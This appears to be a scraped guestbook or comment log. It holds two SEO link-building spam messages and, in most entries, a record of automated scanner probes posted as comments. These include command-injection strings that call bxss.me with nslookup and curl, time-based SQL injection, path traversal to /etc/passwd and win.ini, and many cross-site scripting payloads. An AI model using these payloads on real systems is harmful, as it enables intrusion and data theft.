1255. : HelloYOU NEED HELP TO BUILD SEO LINKS FOR: skr.jp ? I just checked out your website, and wanted to find out if you need help for SEO Link Building ? WE OFFER YOU THE BEST SEO STRATEGY FOR 2021. Build an unlimited number of Backlinks and increase Traffic to your websites which will lead to a higher number of customers and much more sales for you. If You Are Interested, I'm waiting for your response here => seosubmitter@mail.com Thanks, Ingrid Brice - 2021/03/13 20:22:10
1256. : HelloYOU NEED HELP TO BUILD SEO LINKS FOR: primitive-games.jp ? I just checked out your website, and wanted to find out if you need help for SEO Link Building ? WE OFFER YOU THE BEST SEO STRATEGY FOR 2021. Build an unlimited number of Backlinks and increase Traffic to your websites which will lead to a higher number of customers and much more sales for you. If You Are Interested, I'm waiting for your response here => seosubmitter@mail.com Thanks, Grover Atwell - 2021/03/16 04:52:48
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1418. 1: 555 - 2023/11/21 08:44:41
1419. 1: $(nslookup -q=cname hitqqujbbhamf3eb33.bxss.me||curl hitqqujbbhamf3eb33.bxss.me) - 2023/11/21 08:44:42
1420. 1: -1' OR 2+754-754-1=0+0+0+1 or 'BLwq8xB7'=' - 2023/11/21 08:44:42
1421. 1: dfb__${98991*97996}__::.x - 2023/11/21 08:44:42
1422. 1: 555 - 2023/11/21 08:44:42
1423. 1: &nslookup -q=cname hitgoldqzwdazc2507.bxss.me&'"`0&nslookup -q=cname hitgoldqzwdazc2507.bxss.me&`' - 2023/11/21 08:44:42
1424. 1: 555 - 2023/11/21 08:44:42
1425. 1: -1" OR 2+558-558-1=0+0+0+1 -- - 2023/11/21 08:44:42
1426. 1: 555 - 2023/11/21 08:44:42
1427. 1: &(nslookup -q=cname hitjpeixgexff83ba0.bxss.me||curl hitjpeixgexff83ba0.bxss.me)&'"`0&(nslookup -q=cname hitjpeixgexff83ba0.bxss.me||curl hitjpeixgexff83ba0.bxss.me)&`' - 2023/11/21 08:44:42
1428. 1: 555 - 2023/11/21 08:44:42
1429. 1: if(now()=sysdate(),sleep(15),0) - 2023/11/21 08:44:42
1430. 1: 555 - 2023/11/21 08:44:42
1431. 1: |(nslookup -q=cname hitepnlnwbpbi01a85.bxss.me||curl hitepnlnwbpbi01a85.bxss.me) - 2023/11/21 08:44:42
1432. 1: 555 - 2023/11/21 08:44:42
1433. 1: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z - 2023/11/21 08:44:42
1434. 1: `(nslookup -q=cname hithbywmdhfqz7aaab.bxss.me||curl hithbywmdhfqz7aaab.bxss.me)` - 2023/11/21 08:44:43
1435. 1: 555 - 2023/11/21 08:44:43
1436. 1: "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") - 2023/11/21 08:44:43
1437. 1: 555 - 2023/11/21 08:44:43
1438. 1: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z - 2023/11/21 08:44:43
1439. 1: 555 - 2023/11/21 08:44:43
1440. 1: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ - 2023/11/21 08:44:43
1441. echo wotlri$()\ ygiyap\nz^xyu||a #' &echo wotlri$()\ ygiyap\nz^xyu||a #|" &echo wotlri$()\ ygiyap\nz^xyu||a #: 555 - 2023/11/21 08:44:43
1442. 1: -1 - 2023/11/21 08:44:43
1443. &echo wtqqjb$()\ gpfxyu\nz^xyu||a #' &echo wtqqjb$()\ gpfxyu\nz^xyu||a #|" &echo wtqqjb$()\ gpfxyu\nz^xyu||a #: 555 - 2023/11/21 08:44:43
1444. 1: 555<ScRiPt >8oeC(9838)</ScRiPt> - 2023/11/21 08:44:44
1445. 1: -1) - 2023/11/21 08:44:44
1446. 1: 555 - 2023/11/21 08:44:44
1447. 1: 1 waitfor delay '0:0:15' -- - 2023/11/21 08:44:44
1448. |echo synqep$()\ egtmin\nz^xyu||a #' |echo synqep$()\ egtmin\nz^xyu||a #|" |echo synqep$()\ egtmin\nz^xyu||a #: 555 - 2023/11/21 08:44:44
1449. 1: bwEnhBvI' - 2023/11/21 08:44:44
1450. 1: '"() - 2023/11/21 08:44:44
1451. 1|echo xenrbb$()\ uucqkw\nz^xyu||a #' |echo xenrbb$()\ uucqkw\nz^xyu||a #|" |echo xenrbb$()\ uucqkw\nz^xyu||a #: 555 - 2023/11/21 08:44:44
1452. 1: 555<WVAEAA>7SCLI[!+!]</WVAEAA> - 2023/11/21 08:44:44
1453. 1: -5 OR 723=(SELECT 723 FROM PG_SLEEP(15))-- - 2023/11/21 08:44:45
1454. 1: 555'&&sleep(27*1000)*zuobgs&&' - 2023/11/21 08:44:45
1455. (nslookup -q=cname hitlvqgfwlqhz43e52.bxss.me||curl hitlvqgfwlqhz43e52.bxss.me)): 555 - 2023/11/21 08:44:45
1456. 1: -5) OR 57=(SELECT 57 FROM PG_SLEEP(15))-- - 2023/11/21 08:44:45
1457. 1: 555"&&sleep(27*1000)*llqbnz&&" - 2023/11/21 08:44:45
1458. $(nslookup -q=cname hitqbftachqovf9420.bxss.me||curl hitqbftachqovf9420.bxss.me): 555 - 2023/11/21 08:44:45
1459. 1: -1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))-- - 2023/11/21 08:44:45
1460. 1: 555'||sleep(27*1000)*xmtxqw||' - 2023/11/21 08:44:45
1461. &nslookup -q=cname hitjuupkhtyerb743f.bxss.me&'"`0&nslookup -q=cname hitjuupkhtyerb743f.bxss.me&`': 555 - 2023/11/21 08:44:45
1462. 1: yXXz6CeQ' OR 858=(SELECT 858 FROM PG_SLEEP(15))-- - 2023/11/21 08:44:45
1463. 1: 555<script>8oeC(9161)</script> - 2023/11/21 08:44:45
1464. 1: 555"||sleep(27*1000)*dsrwbe||" - 2023/11/21 08:44:45
1465. &(nslookup -q=cname hitbygqvvlzisc0968.bxss.me||curl hitbygqvvlzisc0968.bxss.me)&'"`0&(nslookup -q=cname hitbygqvvlzisc0968.bxss.me||curl hitbygqvvlzisc0968.bxss.me)&`': 555 - 2023/11/21 08:44:45
1466. 1: gqm3NZOT') OR 166=(SELECT 166 FROM PG_SLEEP(15))-- - 2023/11/21 08:44:46
1467. : 555 - 2023/11/21 08:44:46
1468. 1: m7s0Nemx')) OR 162=(SELECT 162 FROM PG_SLEEP(15))-- - 2023/11/21 08:44:46
1469. 1: 555 - 2023/11/21 08:44:46
1470. 1: 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) - 2023/11/21 08:44:46
1471. 1: 555 - 2023/11/21 08:44:46
1472. 1: 555<script>8oeC(9940)</script>9940 - 2023/11/21 08:44:46
1473. 1: ../../../../../../../../../../../../../../etc/passwd - 2023/11/21 08:44:46
1474. 1: 555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' - 2023/11/21 08:44:46
1475. : 555 - 2023/11/21 08:44:47
1476. 1: ../../../../../../../../../../../../../../windows/win.ini - 2023/11/21 08:44:47
1477. 1: 1'" - 2023/11/21 08:44:47
1478. : 555 - 2023/11/21 08:44:47
1479. 1: file:///etc/passwd - 2023/11/21 08:44:47
1480. 1: 1%2527%2522 - 2023/11/21 08:44:47
1481. 1: 555<ScR<ScRiPt>IpT>8oeC(9877)</sCr<ScRiPt>IpT> - 2023/11/21 08:44:47
1482. : 555 - 2023/11/21 08:44:47
1483. 1: @@0z7LN - 2023/11/21 08:44:47
1484. 1: 555 - 2023/11/21 08:44:47
1485. 1: ../555 - 2023/11/21 08:44:48
1486. : 555 - 2023/11/21 08:44:48
1487. 1: 555<ScRiPt>8oeC(9749)</ScRiPt> - 2023/11/21 08:44:48
1488. ../../../../../../../../../../../../../../windows/win.ini: 555 - 2023/11/21 08:44:48
1489. 1: 555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9016></ScRiPt> - 2023/11/21 08:44:49
1490. -1 OR 2+103-103-1=0+0+0+1: 555 - 2023/11/21 08:44:49
1491. 1: 555<ScRiPt>8oeC(9412)</ScRiPt> - 2023/11/21 08:44:50
1492. -1' OR 2+840-840-1=0+0+0+1 --: 555 - 2023/11/21 08:44:50
1493. 1: 555<svgonload=8oeC(9418) - 2023/11/21 08:44:51
1494. -1' OR 3*2>(0+5+840-840) --: 555 - 2023/11/21 08:44:51
1495. 1: 555<isindex type=image src=1 onerror=8oeC(9071)> - 2023/11/21 08:44:52
1496. -1' OR 2+549-549-1=0+0+0+1 or 'HJTvPv3d'=': 555 - 2023/11/21 08:44:52
1497. 1: 555<iframe src='data:text/html - 2023/11/21 08:44:52
1498. -1' OR 3*2>(0+5+549-549) or 'HJTvPv3d'=': 555 - 2023/11/21 08:44:52
1499. 1: 555<body onload=8oeC(9547)> - 2023/11/21 08:44:53
1500. -1" OR 2+441-441-1=0+0+0+1 --: 555 - 2023/11/21 08:44:53
1501. 1: 555<img src=//xss.bxss.me/t/dot.gif onload=8oeC(9063)> - 2023/11/21 08:44:54
1502. if(now()=sysdate(),sleep(15),0): 555 - 2023/11/21 08:44:54
1503. 1: 555<img src=xyz OnErRor=8oeC(9890)> - 2023/11/21 08:44:55
1504. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z: 555 - 2023/11/21 08:44:55
1505. 1: 555<img/src=">" onerror=alert(9828)> - 2023/11/21 08:44:56
1506. -1: 555 - 2023/11/21 08:44:56
1507. 1: %35%35%35%3C%53%63%52%69%50%74%20%3E%38%6F%65%43%289022%29%3C%2F%73%43%72%69%70%54%3E - 2023/11/21 08:44:57
1508. 1 waitfor delay '0:0:15' --: 555 - 2023/11/21 08:44:57
1509. 1: 555\u003CScRiPt\8oeC(9996)\u003C/sCripT\u003E - 2023/11/21 08:44:58
1510. -5 OR 755=(SELECT 755 FROM PG_SLEEP(15))--: 555 - 2023/11/21 08:44:58
1511. 1: 555&lt - 2023/11/21 08:44:58
1512. -5) OR 856=(SELECT 856 FROM PG_SLEEP(15))--: 555 - 2023/11/21 08:44:58
1513. 1: <img zzz onmouseover=8oeC(97091) //> - 2023/11/21 08:44:59
1514. iknV6kTN' OR 705=(SELECT 705 FROM PG_SLEEP(15))--: 555 - 2023/11/21 08:44:59
1515. 1: 555<input autofocus onfocus=8oeC(9686)> - 2023/11/21 08:45:00
1516. W5wtL0Rj')) OR 123=(SELECT 123 FROM PG_SLEEP(15))--: 555 - 2023/11/21 08:45:00
1517. 1: <a HrEF=jaVaScRiPT:> - 2023/11/21 08:45:01
1518. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||': 555 - 2023/11/21 08:45:01
1519. 1: 555}body{zzz:Expre/**/SSion(8oeC(9805))} - 2023/11/21 08:45:02
1520. 1%2527%2522: 555 - 2023/11/21 08:45:02
1521. 1: 555o6vwh<ScRiPt >8oeC(9376)</ScRiPt> - 2023/11/21 08:45:02
1522. 1: 555<W6VMK9>UBGVB[!+!]</W6VMK9> - 2023/11/21 08:45:03
1523. 1: 555<ifRAme sRc=9962.com></IfRamE> - 2023/11/21 08:45:04
1524. 1: 555<ayvBGNZ x=9858> - 2023/11/21 08:45:05
1525. 1: 555<afUcwje< - 2023/11/21 08:45:06
1526. 1'"()&%<zzz><ScRiPt >8oeC(9757)</ScRiPt>: 555 - 2023/11/21 08:45:07
1527. : Hello from Kiddishop. - 2024/02/21 20:30:54